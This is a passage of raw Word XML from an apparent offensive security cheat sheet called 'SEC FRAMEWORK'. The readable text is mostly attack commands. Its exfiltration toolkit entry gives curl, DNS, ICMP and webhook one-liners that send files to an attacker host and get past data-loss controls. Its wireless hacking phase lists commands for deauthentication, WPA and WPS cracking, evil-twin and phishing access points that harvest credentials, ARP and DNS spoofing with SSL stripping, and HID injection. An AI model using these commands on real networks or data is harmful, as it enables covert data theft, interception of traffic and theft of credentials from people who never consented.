        <w:t>Command-line interface for SQLite databases used for local data storage, extraction, and manipulation during post-exploitation activities.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Open Database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'.tables'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Dump Schema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'.schema'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Query Table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'SELECT * FROM $TABLE LIMIT 50;'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Export CSV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'.mode csv' '.output $OUTPUT_FILE' 'SELECT * FROM $TABLE;'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Dump All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'.dump' &gt; $OUTPUT_FILE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Search String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"SELECT * FROM \$TABLE WHERE \$COLUMN LIKE '%\$SEARCH%';"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Import CSV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'.mode csv' '.import $CSV_FILE $TABLE'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Backup DB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'.backup $BACKUP_FILE'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Attach DB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'ATTACH DATABASE "$DB2" AS db2; SELECT * FROM db2.\$TABLE;'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PRAGMA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sqlite3 $DB_FILE 'PRAGMA table_info(\$TABLE);'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ExfilToolKit</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009_10" w:id="100"/>
      <w:bookmarkEnd w:id="100"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collection of scripts and techniques for covert data exfiltration through DNS, ICMP, HTTP, and other common protocols that bypass DLP solutions.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Exfil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dns_exfil.py -s $LHOST -f $FILE -d $DOMAIN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ICMP Exfil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icmp_exfil.py -s $LHOST -f $FILE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 POST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curl -s -X POST -F 'file=@$FILE' http://$LHOST:$LPORT/upload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Base64 Chunk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base64 $FILE | split -b 63 - $CHUNK_PREFIX; for f in $CHUNK_PREFIX*; do nslookup $f.$DOMAIN; done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WebSocket Send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python3 ws_exfil.py -u ws://$LHOST:$LPORT -f $FILE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Slack Webhook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curl -X POST -H 'Content-type: application/json' --data '{"text":"$(base64 -w 0 $FILE)"}' $WEBHOOK_URL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ICMP Ping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xxd -p $FILE | tr -d '\n' | fold -w 32 | while read h; do ping -c 1 -p $h $LHOST; done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HTTPS Upload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curl -k -F 'data=@$FILE' https://$LHOST:$LPORT/receive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TXT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for chunk in $(base64 -w 50 $FILE); do dig +short TXT $chunk.$DOMAIN; done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Multipart Form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curl -F 'file=@$FILE;filename=$FILENAME' -F 'meta=$METADATA' http://$LHOST:$LPORT/exfil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="600" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="c2510c"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Phase 10: Wireless Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>  [★★★★★]</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010" w:id="101"/>
      <w:bookmarkEnd w:id="101"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t>Techniques and tools for assessing the security of wireless networks including Wi-Fi, Bluetooth, RFID, and other radio frequency communications.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  Aircrack-ng Suite</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_01" w:id="102"/>
      <w:bookmarkEnd w:id="102"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Complete suite of tools for auditing wireless networks including monitoring, attacking, testing, and cracking WEP and WPA/WPA2 encryption.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Monitor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airmon-ng start $INTERFACE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Network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airodump-ng $MON_INTERFACE --channel $CHANNEL --write $OUTPUT_PREFIX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Capture Handshake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airodump-ng -c $CHANNEL --bssid $BSSID -w $OUTPUT_PREFIX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Deauth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aireplay-ng -0 $COUNT -a $BSSID -c $CLIENT_MAC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Fake Auth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aireplay-ng -1 0 -e '$ESSID' -a $BSSID -h $FAKE_MAC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ARP Replay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aireplay-ng -3 -b $BSSID -h $FAKE_MAC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Crack WPA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aircrack-ng -w $WORDLIST -b $BSSID $CAPTURE_FILE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Crack WEP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aircrack-ng -a 1 -b $BSSID $CAPTURE_FILE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Decrypt Capture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airdecap-ng -w $HEX_KEY -b $BSSID $CAPTURE_FILE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Create AP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airbase-ng -e '$ESSID' -c $CHANNEL -z $TYPE $MON_INTERFACE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#2  WiFite</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_02" w:id="103"/>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated wireless attack tool that simplifies the process of auditing wireless networks by automating aircrack-ng, reaver, and other tools.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Full Auto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--kill -mac -power 30 -dict $WORDLIST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WPA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--wpa --kill -dict $WORDLIST -inf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WEP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--wep --kill --pps 600 -b $BSSID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Target BSSID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--kill -b $BSSID --channel $CHANNEL -dict $WORDLIST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WPS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--wps --kill --pixie -b $BSSID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Evil Twin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--evil -e '$ESSID' -c $CHANNEL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5GHz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--kill -5 -power 30 -dict $WORDLIST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Crack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--cracked -dict $WORDLIST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Deauth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--kill --nodeauth -dict $WORDLIST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Skip Capture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wifite --kill --dict $WORDLIST --crack $CAPTURE_FILE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#3  Reaver</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_03" w:id="104"/>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WPS brute force attack tool that exploits the WPS vulnerability to recover WPA/WPA2 passphrases from access points with WPS enabled.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Basic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-K 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Pixie Dust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-K 1 -c $CHANNEL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Custom PIN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-p $PIN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Delay Control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-d $DELAY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Timeout Set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-t $TIMEOUT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Session Save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-s $SESSION_FILE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Session Resume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--session=$SESSION_FILE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Lock Ignore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MAC Spoof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-vv --mac=$SPOOF_MAC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ESSID Specify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reaver -i $MON_INTERFACE -b $BSSID -e '$ESSID' -vv -K 1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#4  Bully</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_04" w:id="105"/>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern, fast WPS brute force attack implementation with improved performance and reliability over traditional reaver for WPS exploitation.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Basic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Forced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3 -F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Brute Force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3 -B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Pin Start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3 -S $START_PIN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MAC Spoof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3 -e $FAKE_MAC -s $SOURCE_MAC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Timeout Set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3 -t $TIMEOUT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Receive Timeout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3 -r $RECV_TIMEOUT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Lock Wait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3 -l $LOCK_WAIT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Ignore Locks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3 -L $MON_INTERFACE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Wireless Work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bully -b $BSSID -c $CHANNEL -v 3 -W 2 $MON_INTERFACE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#5  hcxdumptool</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_05" w:id="106"/>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small tool to capture packets from WLAN devices for hashcat processing with advanced filtering and attack capabilities against WPA networks.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Capture Start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hcxdumptool -i $MON_INTERFACE -o $OUTPUT_FILE --enable_status=15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Filter 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hcxdumptool -i $MON_INTERFACE -o $OUTPUT_FILE --filterlist=$FILTER_FILE --filtermode=2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Active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hcxdumptool -i $MON_INTERFACE -o $OUTPUT_FILE --do_rcascan --enable_status=15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Client Directed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hcxdumptool -i $MON_INTERFACE -o $OUTPUT_FILE --filterlist_ap=$AP_FILE --filterlist_client=$CLIENT_FILE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GPS Track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hcxdumptool -i $MON_INTERFACE -o $OUTPUT_FILE --use_gpsd --enable_status=15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SSID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hcxdumptool -i $MON_INTERFACE -o $OUTPUT_FILE --filterlist=$SSID_FILE --filtermode=1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Injection Test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hcxdumptool -i $MON_INTERFACE --check_injection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Read PCAP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-o $HASH_FILE -E $ESSID_LIST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Convert 16800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-o $HASH_FILE --pmkid=$PMKID_FILE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Convert 22000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-o $HASH_FILE -E $ESSID_LIST -I $IDENTITY -S $PASSWORD $PCAP_FILE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#6  Bettercap</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_06" w:id="107"/>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Powerful, modular, portable Swiss Army knife for network attacks and monitoring with extensive Wi-Fi, Bluetooth, and HID capabilities.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WiFi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-iface $INTERFACE -eval 'wifi.recon on; wifi.show'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Deauth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-iface $MON_INTERFACE -eval 'wifi.recon on; set wifi.ticker.period 1; wifi.deauth $BSSID'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Handshake Capture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-iface $MON_INTERFACE -eval 'wifi.recon on; set wifi.handshakes.file $OUTPUT; wifi.assoc all'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WiFi Show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-iface $MON_INTERFACE -eval 'wifi.recon on; wifi.show; wifi.clients'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ARP Spoof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-iface $INTERFACE -eval 'net.probe on; set arp.spoof.targets $TARGET; arp.spoof on; net.sniff on'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BLE Recon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-eval 'ble.recon on; ble.show'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HID Attack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-eval 'hid.inject on; hid.stream $SCRIPT_PATH'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 Recon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-iface $INTERFACE -eval 'net.probe on; net.show'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DNS Spoof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-iface $INTERFACE -eval 'set dns.spoof.domains $DOMAIN; set dns.spoof.address $FAKE_IP; dns.spoof on'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Proxy Module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bettercap -iface $INTERFACE -eval 'set http.proxy.sslstrip true; http.proxy on'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#7  Kismet</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_07" w:id="108"/>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Wireless network and device detector, sniffer, wardriving tool, and WIDS framework that supports Wi-Fi, Bluetooth, and RTLSDR devices.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Capture Start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 -c $MON_INTERFACE --log-prefix $LOG_PREFIX --title $TITLE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Server Only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kismet_server -c $MON_INTERFACE -f $CONFIG_FILE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Client Connect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kismet_client -s $SERVER:$PORT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Config Override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 -c $MON_INTERFACE --override wardir=$LOG_DIR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GPS Enable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 -c $MON_INTERFACE --override gps=serial:device=/dev/ttyUSB0,name=gps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Multiple Sources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 -c $MON_INTERFACE1 -c $MON_INTERFACE2 -c $MON_INTERFACE3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XML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 -c $MON_INTERFACE --override logtypes=xml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NetXML Export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cat $KISMET_NETXML | xsltproc kismet.xsl - &gt; $OUTPUT_HTML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Silent Mode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kismet_server -c $MON_INTERFACE -s -f $CONFIG_FILE -t $LOG_TITLE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Data Source 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kismet --list-datasources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#8  hcxtools</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_08" w:id="109"/>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Suite of utilities for converting and analyzing WLAN capture files for hashcat, including WPA handshake extraction and PMKID attack preparation.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PCAP to 22000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-o $HASH_FILE -E $ESSID_LIST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PMKID Extract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-k $PMKID_FILE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HCCAPX Convert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-o $HCCAPX_FILE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SSID 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-E $ESSID_FILE -X $IDENTITY_FILE -P $PASSWORD_FILE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MAC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-o $HASH_FILE --filterlist=$MAC_FILE --filtermode=1 $PCAP_FILE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John Output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-j $JOHN_FILE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Info Display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hcxpcapngtool -I $PCAP_FILE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Hash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hcxhashtool -i $HASH_FILE --info=stdout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ESSID Filter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hcxhashtool -i $HASH_FILE --essid-list=$ESSID_FILE -o $FILTERED_FILE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MAC Uniq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hcxhashtool -i $HASH_FILE --mac-ap-uniq -o $UNIQ_FILE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#9  wifiphisher</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_09" w:id="110"/>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Automated phishing attacks against Wi-Fi networks by creating rogue access points and captive portals to harvest credentials.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ESSID Jam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$INTERFACE1 -jI $INTERFACE2 -p oauth-login -e '$ESSID' -kN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Firmweb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 -p firmware-upgrade --phishing-ssid '$ESSID'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Plugin OAuth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 -p oauth-login --essid '$ESSID' -pK $PMKID_FILE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Scenario List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--help | grep -A 50 'SCENARIO'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MAC Random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 -p oauth-login --mac-ap-interface -e '$ESSID'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No Deauth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 -p oauth-login -nD -e '$ESSID'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Handover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 -p plugin_update -qS --handover -e '$ESSID'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DHCP Script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 -p oauth-login --dhcp-script $SCRIPT -e '$ESSID'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Log Directory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 -p oauth-login -lP $LOG_DIR -e '$ESSID'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Credential Harvest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wifiphisher -aI $INTERFACE -p wifi_connect --logging -c $CHANNEL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="400" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="ff6b35"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>#10  bluetooth-tools (hcitool/bluetoothctl)</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc010_10" w:id="111"/>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Native Linux Bluetooth stack tools for device discovery, service enumeration, and low-level Bluetooth protocol interaction and testing.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Device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hcitool scan --flush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LE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hcitool lescan --duplicates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Device Info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hcitool info $BD_ADDR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SDP Browse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sdptool browse $BD_ADDR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SP Connect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rfcomm connect $RFCOMM_DEV $BD_ADDR $CHANNEL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L2CAP Ping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l2ping -c 5 $BD_ADDR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Device Name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hcitool name $BD_ADDR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Class Check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hcitool dc $BD_ADDR; hcitool cc $BD_ADDR; hcitool dc $BD_ADDR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Inquiry Scan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hcitool inq --length=5 --numrsp=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>  Bluetoothctl Pair</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:shd w:val="clear" w:fill="f5f0eb"/>
        <w:spacing w:before="40" w:after="120"/>
        <w:ind w:left="400" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2d2d2d"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">bluetoothctl scan on; bluetoothctl pair $BD_ADDR; bluetoothctl trust $BD_ADDR; bluetoothctl connect $BD_ADDR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:headerReference w:type="default" r:id="Raa3fb03d5fcf421e"/>
          <w:footerReference w:type="default" r:id="R5a4c58326ab74166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dc51bc9e5faa45d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b/>
          <w:color w:val="c2510c"/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>SEC FRAMEWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4a4a4a"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10 Phases  |  100 Tools  |  1000 Commands</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7a7a7a"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>For Authorized Security Testing Only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7a7a7a"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>June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7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> NUMPAGES </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="7a7a7a"/>
        <w:sz w:val="16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5dec6228fe0d4d16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a7a7a"/>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>SEC FRAMEWORK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onsolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
      <w:color w:val="1a1a1a"/>
      <w:sz w:val="20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rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
      <w:b/>
      <w:color w:val="c2510c"/>
      <w:sz w:val="44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onsolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
      <w:b/>
      <w:color w:val="ff6b35"/>
      <w:sz w:val="32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onsolas" w:hAnsi="Consolas" w:eastAsia="Microsoft YaHei"/>
      <w:b/>
      <w:color w:val="1a1a1a"/>
      <w:sz w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="240"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="7a7a7a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40"/>
      <w:ind w:left="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="1a1a1a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
      </w:tabs>
      <w:spacing w:before="80" w:after="40"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="4a4a4a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40"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="4a4a4a"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:shd w:val="clear" w:fill="f5f0eb"/>
      <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="2d2d2d"/>
      <w:sz w:val="16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7c4edaffc4d4646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R1b7ddd32234b43ca" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image.png" Id="Rf350ac9be6bf44a6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png" Id="Rdc51bc9e5faa45da" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml" Id="Raa3fb03d5fcf421e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml" Id="R5a4c58326ab74166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" Id="R414844348868450c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5dec6228fe0d4d16" /></Relationships>
</file>